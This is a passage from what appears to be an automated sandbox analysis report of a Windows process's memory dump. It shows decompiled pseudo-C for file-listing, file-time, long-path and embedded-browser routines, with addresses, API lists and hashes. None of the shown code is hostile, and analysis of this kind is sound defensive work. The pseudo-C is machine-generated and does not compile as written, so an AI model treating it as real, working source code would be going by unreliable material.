								__eflags = _t144 - _t209;
							} while (_t144 != _t209);
							_t190 = _v16;
							_v8 = _t157;
							_t150 = _v336.cAlternateFileName;
						}
						_t210 = E00286F0C(_t190, _v8, 1);
						_t224 = _t223 + 0xc;
						__eflags = _t210;
						if(_t210 != 0) {
							_t87 = _t210 + _v16 * 4;
							_v20 = _t87;
							_t191 = _t87;
							_v16 = _t87;
							__eflags = _t198 - _t150;
							if(_t198 == _t150) {
								L23:
								_t199 = 0;
								__eflags = 0;
								 *_a8 = _t210;
								goto L24;
							} else {
								_t93 = _t210 - _t198;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t162 =  *_t198;
									_v12 = _t162 + 1;
									do {
										_t95 =  *_t162;
										_t162 = _t162 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t163 = _t162 - _v12;
									_t35 = _t163 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E0028DD71(_t163, _t191, _v20 - _t191 + _v8,  *_t198);
									_t224 = _t224 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00287DBB();
										asm("int3");
										_t220 = _t224;
										_push(_t163);
										_t164 = _v64;
										_t47 = _t164 + 1; // 0x1
										_t192 = _t47;
										do {
											_t103 =  *_t164;
											_t164 = _t164 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t198);
										_t201 = _a8;
										_t166 = _t164 - _t192 + 1;
										_v12 = _t166;
										__eflags = _t166 - (_t103 | 0xffffffff) - _t201;
										if(_t166 <= (_t103 | 0xffffffff) - _t201) {
											_push(_t150);
											_t50 = _t201 + 1; // 0x1
											_t153 = _t50 + _t166;
											_t212 = E00287B1B(_t166, _t153, 1);
											_t168 = _t210;
											__eflags = _t201;
											if(_t201 == 0) {
												L34:
												_push(_v12);
												_t153 = _t153 - _t201;
												_t108 = E0028DD71(_t168, _t212 + _t201, _t153, _v0);
												_t225 = _t224 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t136 = E0028A212(_a12, _t192, __eflags, _t212);
													E00287A50(0);
													_t138 = _t136;
													goto L36;
												}
											} else {
												_push(_t201);
												_t139 = E0028DD71(_t168, _t212, _t153, _a4);
												_t225 = _t224 + 0x10;
												__eflags = _t139;
												if(_t139 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00287DBB();
													asm("int3");
													_push(_t220);
													_t221 = _t225;
													_t226 = _t225 - 0x150;
													_t111 =  *0x29d668; // 0xd26a0a57
													_v116 = _t111 ^ _t221;
													_t169 = _v100;
													_push(_t153);
													_t154 = _v104;
													_push(_t212);
													_t213 = _v96;
													_push(_t201);
													_v440 = _t213;
													while(1) {
														__eflags = _t169 - _t154;
														if(_t169 == _t154) {
															break;
														}
														_t113 =  *_t169;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t169 = E0028DDC0(_t154, _t169);
																	continue;
																}
															}
														}
														break;
													}
													_t193 =  *_t169;
													__eflags = _t193 - 0x3a;
													if(_t193 != 0x3a) {
														L47:
														_t202 = 0;
														__eflags = _t193 - 0x2f;
														if(_t193 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t193 - 0x5c;
															if(_t193 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t193 - 0x3a;
																if(_t193 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
														E0027E920(_t202,  &_v336, _t202, 0x140);
														_t227 = _t226 + 0xc;
														_t214 = FindFirstFileExA(_t154, _t202,  &_v336, _t202, _t202, _t202);
														_t123 = _v340;
														__eflags = _t214 - 0xffffffff;
														if(_t214 != 0xffffffff) {
															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t173;
															_v348 = _t173 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t154);
																	_push(_t123);
																	L28();
																	_t227 = _t227 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t177 = _v291;
																	__eflags = _t177;
																	if(_t177 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t177 - 0x2e;
																		if(_t177 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t214,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t194 =  *_t123;
															_t178 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t178 - _t131;
															if(_t178 != _t131) {
																E00285030(_t154, _t202, _t214, _t194 + _t178 * 4, _t131 - _t178, 4, E00289E2B);
															}
														} else {
															_push(_t123);
															_push(_t202);
															_push(_t202);
															_push(_t154);
															L28();
															L54:
															_t202 = _t123;
														}
														__eflags = _t214 - 0xffffffff;
														if(_t214 != 0xffffffff) {
															FindClose(_t214);
														}
														_t124 = _t202;
													} else {
														_t124 =  &(_t154[1]);
														__eflags = _t169 -  &(_t154[1]);
														if(_t169 ==  &(_t154[1])) {
															goto L47;
														} else {
															_push(_t213);
															_push(0);
															_push(0);
															_push(_t154);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t221;
													return E0027E203(_t124, _v16 ^ _t221);
												} else {
													goto L34;
												}
											}
										} else {
											_t138 = 0xc;
											L36:
											return _t138;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t195 = _v16;
									 *((intOrPtr*)(_v24 + _t198)) = _t195;
									_t198 = _t198 + 4;
									_t191 = _t195 + _v12;
									_v16 = _t195 + _v12;
									__eflags = _t198 - _t150;
								} while (_t198 != _t150);
								goto L23;
							}
						} else {
							_t199 = _t198 | 0xffffffff;
							L24:
							E00287A50(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t159;
							_t146 = E0028DD80( *_t207,  &_v8);
							__eflags = _t146;
							if(_t146 != 0) {
								_push( &_v36);
								_push(_t146);
								_push( *_t207);
								L38();
								_t223 = _t223 + 0xc;
							} else {
								_t146 =  &_v36;
								_push(_t146);
								_push(0);
								_push(0);
								_push( *_t207);
								L28();
								_t223 = _t223 + 0x10;
							}
							_t199 = _t146;
							__eflags = _t199;
							if(_t199 != 0) {
								break;
							}
							_t207 = _t207 + 4;
							_t159 = 0;
							__eflags =  *_t207;
							if( *_t207 != 0) {
								continue;
							} else {
								_t150 = _v336.cAlternateFileName;
								_t198 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E0028A1ED( &_v36);
						_t91 = _t199;
						goto L26;
					}
				} else {
					_t147 = E00287ECC();
					_t218 = 0x16;
					 *_t147 = _t218;
					E00287DAB();
					_t91 = _t218;
					L26:
					return _t91;
				}
				L68:
			}

0x00289e48
0x00289e4b
0x00289e51
0x00289e69
0x00289e6c
0x00289e70
0x00289e72
0x00289e74
0x00289e76
0x00289e79
0x00289e7c
0x00289e7f
0x00289e81
0x00289ed9
0x00289ed9
0x00289edf
0x00289ee1
0x00289eec
0x00289ef0
0x00289ef2
0x00289ef5
0x00289ef9
0x00289ef9
0x00289efb
0x00289efd
0x00289eff
0x00289f01
0x00289f01
0x00289f03
0x00289f06
0x00289f09
0x00289f09
0x00289f0b
0x00289f0c
0x00289f0c
0x00289f17
0x00289f19
0x00289f1c
0x00289f1d
0x00289f20
0x00289f20
0x00289f24
0x00289f27
0x00289f2a
0x00289f2a
0x00289f38
0x00289f3a
0x00289f3d
0x00289f3f
0x00289f49
0x00289f4c
0x00289f4f
0x00289f51
0x00289f54
0x00289f56
0x00289fa6
0x00289fa9
0x00289fa9
0x00289fab
0x00000000
0x00289f58
0x00289f5a
0x00289f5a
0x00289f5c
0x00289f5f
0x00289f5f
0x00289f64
0x00289f67
0x00289f67
0x00289f69
0x00289f6a
0x00289f6a
0x00289f6e
0x00289f71
0x00289f71
0x00289f74
0x00289f77
0x00289f84
0x00289f89
0x00289f8c
0x00289f8e
0x00289fc8
0x00289fc9
0x00289fca
0x00289fcb
0x00289fcc
0x00289fcd
0x00289fd2
0x00289fd6
0x00289fd8
0x00289fd9
0x00289fdc
0x00289fdc
0x00289fdf
0x00289fdf
0x00289fe1
0x00289fe2
0x00289fe2
0x00289feb
0x00289fec
0x00289fef
0x00289ff2
0x00289ff5
0x00289ff7
0x00289ffe
0x0028a000
0x0028a003
0x0028a00d
0x0028a010
0x0028a011
0x0028a013
0x0028a027
0x0028a027
0x0028a02a
0x0028a034
0x0028a039
0x0028a03c
0x0028a03e
0x00000000
0x0028a040
0x0028a044
0x0028a04d
0x0028a053
0x00000000
0x0028a056
0x0028a015
0x0028a015
0x0028a01b
0x0028a020
0x0028a023
0x0028a025
0x0028a05c
0x0028a05e
0x0028a05f
0x0028a060
0x0028a061
0x0028a062
0x0028a063
0x0028a068
0x0028a06b
0x0028a06c
0x0028a06e
0x0028a074
0x0028a07b
0x0028a07e
0x0028a081
0x0028a082
0x0028a085
0x0028a086
0x0028a089
0x0028a08a
0x0028a0ab
0x0028a0ab
0x0028a0ad
0x00000000
0x00000000
0x0028a092
0x0028a094
0x0028a096
0x0028a098
0x0028a09a
0x0028a09c
0x0028a09e
0x0028a0a9
0x00000000
0x0028a0a9
0x0028a09e
0x0028a09a
0x00000000
0x0028a096
0x0028a0af
0x0028a0b1
0x0028a0b4
0x0028a0cd
0x0028a0cd
0x0028a0cf
0x0028a0d2
0x0028a0e2
0x0028a0e4
0x0028a0e4
0x0028a0d4
0x0028a0d4
0x0028a0d7
0x00000000
0x0028a0d9
0x0028a0d9
0x0028a0dc
0x00000000
0x0028a0de
0x0028a0de
0x0028a0de
0x0028a0dc
0x0028a0d7
0x0028a0f2
0x0028a0f6
0x0028a104
0x0028a109
0x0028a11e
0x0028a120
0x0028a126
0x0028a129
0x0028a15b
0x0028a15b
0x0028a160
0x0028a166
0x0028a166
0x0028a16d
0x0028a187
0x0028a187
0x0028a188
0x0028a18e
0x0028a194
0x0028a195
0x0028a196
0x0028a19b
0x0028a19e
0x0028a1a0
0x00000000
0x00000000
0x00000000
0x00000000
0x0028a16f
0x0028a16f
0x0028a175
0x0028a177
0x00000000
0x0028a179
0x0028a179
0x0028a17c
0x00000000
0x0028a17e
0x0028a17e
0x0028a185
0x00000000
0x00000000
0x00000000
0x00000000
0x0028a185
0x0028a17c
0x0028a177
0x00000000
0x0028a1a2
0x0028a1aa
0x0028a1b0
0x0028a1b2
0x0028a1b2
0x0028a1ba
0x0028a1bf
0x0028a1c7
0x0028a1ca
0x0028a1cc
0x0028a1e0
0x0028a1e5
0x0028a12b
0x0028a12b
0x0028a12c
0x0028a12d
0x0028a12e
0x0028a12f
0x0028a137
0x0028a137
0x0028a137
0x0028a139
0x0028a13c
0x0028a13f
0x0028a13f
0x0028a145
0x0028a0b6
0x0028a0b6
0x0028a0b9
0x0028a0bb
0x00000000
0x0028a0bd
0x0028a0bd
0x0028a0c0
0x0028a0c1
0x0028a0c2
0x0028a0c3
0x0028a0c8
0x0028a0bb
0x0028a147
0x0028a14c
0x0028a157
0x00000000
0x00000000
0x00000000
0x0028a025
0x00289ff9
0x00289ffb
0x0028a057
0x0028a05b
0x0028a05b
0x00000000
0x00000000
0x00000000
0x00000000
0x00289f90
0x00289f93
0x00289f96
0x00289f99
0x00289f9c
0x00289f9f
0x00289fa2
0x00289fa2
0x00000000
0x00289f5f
0x00289f41
0x00289f41
0x00289fad
0x00289faf
0x00000000
0x00289fb4
0x00289e83
0x00289e83
0x00289e86
0x00289e8f
0x00289e92
0x00289e99
0x00289e9b
0x00289eb4
0x00289eb5
0x00289eb6
0x00289eb8
0x00289ebd
0x00289e9d
0x00289e9d
0x00289ea0
0x00289ea1
0x00289ea3
0x00289ea5
0x00289ea7
0x00289eac
0x00289eac
0x00289ec0
0x00289ec2
0x00289ec4
0x00000000
0x00000000
0x00289eca
0x00289ecd
0x00289ecf
0x00289ed1
0x00000000
0x00289ed3
0x00289ed3
0x00289ed6
0x00000000
0x00289ed6
0x00000000
0x00289ed1
0x00289fb5
0x00289fb8
0x00289fbd
0x00000000
0x00289fc0
0x00289e53
0x00289e53
0x00289e5a
0x00289e5b
0x00289e5d
0x00289e62
0x00289fc1
0x00289fc5
0x00289fc5
0x00000000

APIs

_free.LIBCMT ref: 00289FAF

Part of subcall function 00287DBB: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00287DBD
Part of subcall function 00287DBB: GetCurrentProcess.KERNEL32(C0000417,0029A968,0000002C,00287AE8,00000016,00288599), ref: 00287DDF
Part of subcall function 00287DBB: TerminateProcess.KERNEL32(00000000), ref: 00287DE6

Strings

., xrefs: 0028A166
*?, xrefs: 00289E86

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
Instruction ID: c5c265bf6a9040072da71f186cb0a51ee3a677fd57d3fb1539e2718ec4049bd5
Opcode Fuzzy Hash: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
Instruction Fuzzy Hash: 1C510579E1110A9FDF14EFA8C880ABDBBF5EF58314F28416AE504E7381E7319E518B50

Uniqueness

Uniqueness Score: -1.00%

Function 00267570, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138
timeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00267570(void* __ecx, void* __edx) {
				void* __esi;
				char _t54;
				signed int _t57;
				void* _t61;
				signed int _t62;
				signed int _t68;
				signed int _t85;
				void* _t90;
				void* _t99;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				_t99 = __edx;
				E0027D870(E00291298, _t108);
				E0027D940();
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E0026FAB1(_t108 - 0x1010, _t106, 0x802);
					L4:
					_t81 =  *((intOrPtr*)(_t108 + 8));
					E00267773(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x407c, 0x800);
					_t113 =  *((short*)(_t108 - 0x407c)) - 0x3a;
					if( *((short*)(_t108 - 0x407c)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E0026FA89(__eflags, _t108 - 0x1010, _t108 - 0x407c, _t101);
							E00266EF9(_t108 - 0x307c);
							_push(0);
							_t54 = E0026A1B1(_t108 - 0x307c, _t99, __eflags, _t106, _t108 - 0x307c);
							_t85 =  *(_t108 - 0x2074);
							 *((char*)(_t108 + 0x13)) = _t54;
							__eflags = _t85 & 0x00000001;
							if((_t85 & 0x00000001) != 0) {
								__eflags = _t85 & 0xfffffffe;
								E0026A12F(_t106, _t85 & 0xfffffffe);
							}
							E0026943C(_t108 - 0x2034);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t57 = E00269BE6(_t108 - 0x2034, __eflags, _t108 - 0x1010, 0x11);
							__eflags = _t57;
							if(_t57 != 0) {
								_push(0);
								_push(_t108 - 0x2034);
								_push(0);
								_t68 = E0026399D(_t81, _t99);
								__eflags = _t68;
								if(_t68 != 0) {
									E002694DA(_t108 - 0x2034);
								}
							}
							E0026943C(_t108 - 0x50a0);
							__eflags =  *((char*)(_t108 + 0x13));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 + 0x13)) != 0) {
								_t62 = E00269768(_t108 - 0x50a0, _t106, _t106, 5);
								__eflags = _t62;
								if(_t62 != 0) {
									SetFileTime( *(_t108 - 0x509c), _t108 - 0x2054, _t108 - 0x204c, _t108 - 0x2044);
								}
							}
							E0026A12F(_t106,  *(_t108 - 0x2074));
							E0026946E(_t108 - 0x50a0);
							_t90 = _t108 - 0x2034;
						} else {
							E0026943C(_t108 - 0x60c4);
							_push(1);
							_push(_t108 - 0x60c4);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E0026399D(_t81, _t99);
							_t90 = _t108 - 0x60c4;
						}
						_t61 = E0026946E(_t90);
					} else {
						E00266BF5(_t113, 0x53, _t81 + 0x1e, _t106);
						_t61 = E00266E03(0x2a00e0, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t61;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E0026FAB1(_t108 - 0x1010, 0x292490, 0x802);
					E0026FA89(_t112, _t108 - 0x1010, _t106, 0x802);
					goto L4;
				}
			}

0x00267570
0x00267575
0x0026757f
0x00267586
0x0026758f
0x002675be
0x002675be
0x002675cc
0x002675d1
0x002675d1
0x002675e1
0x002675e6
0x002675ee
0x0026760d
0x00267611
0x0026764e
0x00267659
0x00267666
0x00267669
0x0026766e
0x00267674
0x00267677
0x0026767a
0x0026767c
0x00267681
0x00267681
0x0026768c
0x00267699
0x002676a7
0x002676ac
0x002676ae
0x002676b0
0x002676b9
0x002676ba
0x002676bb
0x002676c0
0x002676c2
0x002676ca
0x002676ca
0x002676c2
0x002676d5
0x002676da
0x002676de
0x002676e2
0x002676ed
0x002676f2
0x002676f4
0x00267711
0x00267711
0x002676f4
0x0026771e
0x00267729
0x0026772e
0x00267613
0x00267619
0x0026761e
0x00267628
0x00267629
0x0026762c
0x0026762f
0x00267634
0x00267634
0x00267734
0x002675f0
0x002675f7
0x00267603
0x00267603
0x0026773f
0x00267749
0x00267749
0x00267591
0x00267595
0x00000000
0x00267597
0x00267597
0x002675a9
0x002675b7
0x00000000
0x002675b7

APIs

__EH_prolog.LIBCMT ref: 00267575
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00267711

Part of subcall function 0026A12F: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00269F65,?,?,?,00269DFE,?,00000001,00000000,?,?), ref: 0026A143
Part of subcall function 0026A12F: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00269F65,?,?,?,00269DFE,?,00000001,00000000,?,?), ref: 0026A174

Strings

:, xrefs: 002675E6

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: 35aea4e0c193f9a495ea295b7d422931e00324bee6133077942bd06b66c39019
Instruction ID: be18843f33db65e9eeb3bfac0caab795e6062800ddff184cf73a0b2c54db0e3e
Opcode Fuzzy Hash: 35aea4e0c193f9a495ea295b7d422931e00324bee6133077942bd06b66c39019
Instruction Fuzzy Hash: 99418071825118AADB25EB64DD59EEFB77CAF45304F4040D9BA09A2082DB705FE8CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0026B32C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0026B32C(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				signed short* _t30;
				long _t32;
				short _t33;
				void* _t39;
				signed short* _t52;
				void* _t53;
				signed short* _t62;
				void* _t66;
				intOrPtr _t69;
				signed short* _t71;
				intOrPtr _t73;

				E0027D940();
				_t71 = _a4;
				if( *_t71 != 0) {
					E0026B4C6(_t71);
					_t66 = E00282B33(_t71);
					_t30 = E0026B4F2(_t71);
					__eflags = _t30;
					if(_t30 == 0) {
						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t32;
						if(_t32 == 0) {
							L22:
							_t33 = 0;
							__eflags = 0;
							L23:
							goto L24;
						}
						__eflags = _t32 - 0x7ff;
						if(_t32 > 0x7ff) {
							goto L22;
						}
						__eflags = E0026B5CD( *_t71 & 0x0000ffff);
						if(__eflags == 0) {
							E0026AEA5(__eflags,  &_v4100, 0x800);
							_t39 = E00282B33( &_v4100);
							_t69 = _a12;
							__eflags = _t69 - _t39 + _t66 + 4;
							if(_t69 <= _t39 + _t66 + 4) {
								goto L22;
							}
							E0026FAB1(_a8, L"\\\\?\\", _t69);
							E0026FA89(__eflags, _a8,  &_v4100, _t69);
							__eflags =  *_t71 - 0x2e;
							if(__eflags == 0) {
								__eflags = E0026B5CD(_t71[1] & 0x0000ffff);
								if(__eflags != 0) {
									_t71 =  &(_t71[2]);
									__eflags = _t71;
								}
							}
							L19:
							_push(_t69);
							L20:
							_push(_t71);
							L21:
							_push(_a8);
							E0026FA89(__eflags);
							_t33 = 1;
							goto L23;
						}
						_t13 = _t66 + 6; // 0x6
						_t69 = _a12;
						__eflags = _t69 - _t13;
						if(_t69 <= _t13) {
							goto L22;
						}
						E0026FAB1(_a8, L"\\\\?\\", _t69);
						_v4096 = 0;
						E0026FA89(__eflags, _a8,  &_v4100, _t69);
						goto L19;
					}
					_t52 = E0026B4C6(_t71);
					__eflags = _t52;
					if(_t52 == 0) {
						_t53 = 0x5c;
						__eflags =  *_t71 - _t53;
						if( *_t71 != _t53) {
							goto L22;
						}
						_t62 =  &(_t71[1]);
						__eflags =  *_t62 - _t53;
						if( *_t62 != _t53) {
							goto L22;
						}
						_t73 = _a12;
						_t9 = _t66 + 6; // 0x6
						__eflags = _t73 - _t9;
						if(_t73 <= _t9) {
							goto L22;
						}
						E0026FAB1(_a8, L"\\\\?\\", _t73);
						E0026FA89(__eflags, _a8, L"UNC", _t73);
						_push(_t73);
						_push(_t62);
						goto L21;
					}
					_t2 = _t66 + 4; // 0x4
					__eflags = _a12 - _t2;
					if(_a12 <= _t2) {
						goto L22;
					}
					E0026FAB1(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L20;
				} else {
					_t33 = 0;
					L24:
					return _t33;
				}
			}

0x0026b334
0x0026b33a
0x0026b341
0x0026b34d
0x0026b35a
0x0026b35c
0x0026b361
0x0026b363
0x0026b3e9
0x0026b3ef
0x0026b3f1
0x0026b4b0
0x0026b4b0
0x0026b4b0
0x0026b4b2
0x00000000
0x0026b4b3
0x0026b3f7
0x0026b3f9
0x00000000
0x00000000
0x0026b408
0x0026b40a
0x0026b44f
0x0026b45b
0x0026b465
0x0026b469
0x0026b46b
0x00000000
0x00000000
0x0026b476
0x0026b486
0x0026b48b
0x0026b48f
0x0026b49b
0x0026b49d
0x0026b49f
0x0026b49f
0x0026b49f
0x0026b49d
0x0026b4a2
0x0026b4a2
0x0026b4a3
0x0026b4a3
0x0026b4a4
0x0026b4a4
0x0026b4a7
0x0026b4ac
0x00000000
0x0026b4ac
0x0026b40c
0x0026b40f
0x0026b412
0x0026b414
0x00000000
0x00000000
0x0026b423
0x0026b42a
0x0026b43c
0x00000000
0x0026b43c
0x0026b366
0x0026b36b
0x0026b36d
0x0026b395
0x0026b396
0x0026b399
0x00000000
0x00000000
0x0026b39f
0x0026b3a2
0x0026b3a5
0x00000000
0x00000000
0x0026b3ab
0x0026b3ae
0x0026b3b1
0x0026b3b3
0x00000000
0x00000000
0x0026b3c2
0x0026b3d0
0x0026b3d5
0x0026b3d6
0x00000000
0x0026b3d6
0x0026b36f
0x0026b372
0x0026b375
0x00000000
0x00000000
0x0026b386
0x0026b38b
0x00000000
0x0026b343
0x0026b343
0x0026b4b4
0x0026b4b8
0x0026b4b8

Strings

UNC, xrefs: 0026B3C8
\\?\, xrefs: 0026B37E, 0026B3BA, 0026B41B, 0026B46E

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: 4786bb83b0747dc2b0f656db7762b79573dc0f19fbce55446d61ffa9ab82dbd7
Instruction ID: adf745100a0eba5dba254d9b4640eea73d1620068d6eda6bef90d0e337b2cddb
Opcode Fuzzy Hash: 4786bb83b0747dc2b0f656db7762b79573dc0f19fbce55446d61ffa9ab82dbd7
Instruction Fuzzy Hash: B741D135460219BACF22AF61DD51EEB37A9AF05351F008065F918E3242DF749DF49FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00278A07, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00278A07(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				void* __esi;
				intOrPtr _t18;
				char _t19;
				intOrPtr* _t23;
				signed int _t25;
				void* _t26;
				intOrPtr* _t28;
				void* _t38;
				void* _t43;
				intOrPtr _t44;
				signed int* _t48;

				_t44 = _a4;
				_t43 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = _t44;
				_t18 = E0027D82C(__edx, _t44, __eflags, 0x30);
				_a4 = _t18;
				if(_t18 == 0) {
					_t19 = 0;
					__eflags = 0;
				} else {
					_t19 = E002783B5(_t18);
				}
				 *((intOrPtr*)(_t43 + 0xc)) = _t19;
				if(_t19 == 0) {
					return _t19;
				} else {
					 *((intOrPtr*)(_t19 + 0x18)) = _t44;
					E00279184( *((intOrPtr*)(_t43 + 0xc)), L"Shell.Explorer");
					E0027931D( *((intOrPtr*)(_t43 + 0xc)), 1);
					E002792D3( *((intOrPtr*)(_t43 + 0xc)), 1);
					_t23 = E00279238( *((intOrPtr*)(_t43 + 0xc)));
					_t28 = _t23;
					if(_t28 == 0) {
						L7:
						__eflags =  *(_t43 + 0x10);
						if( *(_t43 + 0x10) != 0) {
							E00278581(_t43);
							_t25 =  *(_t43 + 0x10);
							_push(0);
							_push(0);
							_push(0);
							 *((char*)(_t43 + 0x25)) = 0;
							_t38 =  *_t25;
							_push(0);
							__eflags =  *(_t43 + 0x20);
							if( *(_t43 + 0x20) == 0) {
								_push(L"about:blank");
							} else {
								_push( *(_t43 + 0x20));
							}
							_t23 =  *((intOrPtr*)(_t38 + 0x2c))(_t25);
						}
						L12:
						return _t23;
					}
					_t10 = _t43 + 0x10; // 0x10
					_t48 = _t10;
					_t26 =  *((intOrPtr*)( *_t28))(_t28, 0x29412c, _t48);
					_t23 =  *((intOrPtr*)( *_t28 + 8))(_t28);
					if(_t26 >= 0) {
						goto L7;
					}
					 *_t48 =  *_t48 & 0x00000000;
					goto L12;
				}
			}

0x00278a08
0x00278a0d
0x00278a11
0x00278a14
0x00278a19
0x00278a20
0x00278a2b
0x00278a2b
0x00278a22
0x00278a24
0x00278a24
0x00278a2d
0x00278a32
0x00278abd
0x00278a38
0x00278a3a
0x00278a45
0x00278a4f
0x00278a59
0x00278a61
0x00278a66
0x00278a6a
0x00278a8c
0x00278a8e
0x00278a91
0x00278a95
0x00278a9a
0x00278a9d
0x00278a9e
0x00278a9f
0x00278aa0
0x00278aa3
0x00278aa5
0x00278aa6
0x00278aa9
0x00278ab0
0x00278aab
0x00278aab
0x00278aab
0x00278ab6
0x00278ab6
0x00278ab9
0x00000000
0x00278aba
0x00278a6e
0x00278a6e
0x00278a78
0x00278a7f
0x00278a84
0x00000000
0x00000000
0x00278a86
0x00000000
0x00278a86

APIs

new.LIBCMT ref: 00278A14

Strings

Shell.Explorer, xrefs: 00278A40
about:blank, xrefs: 00278AB0

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
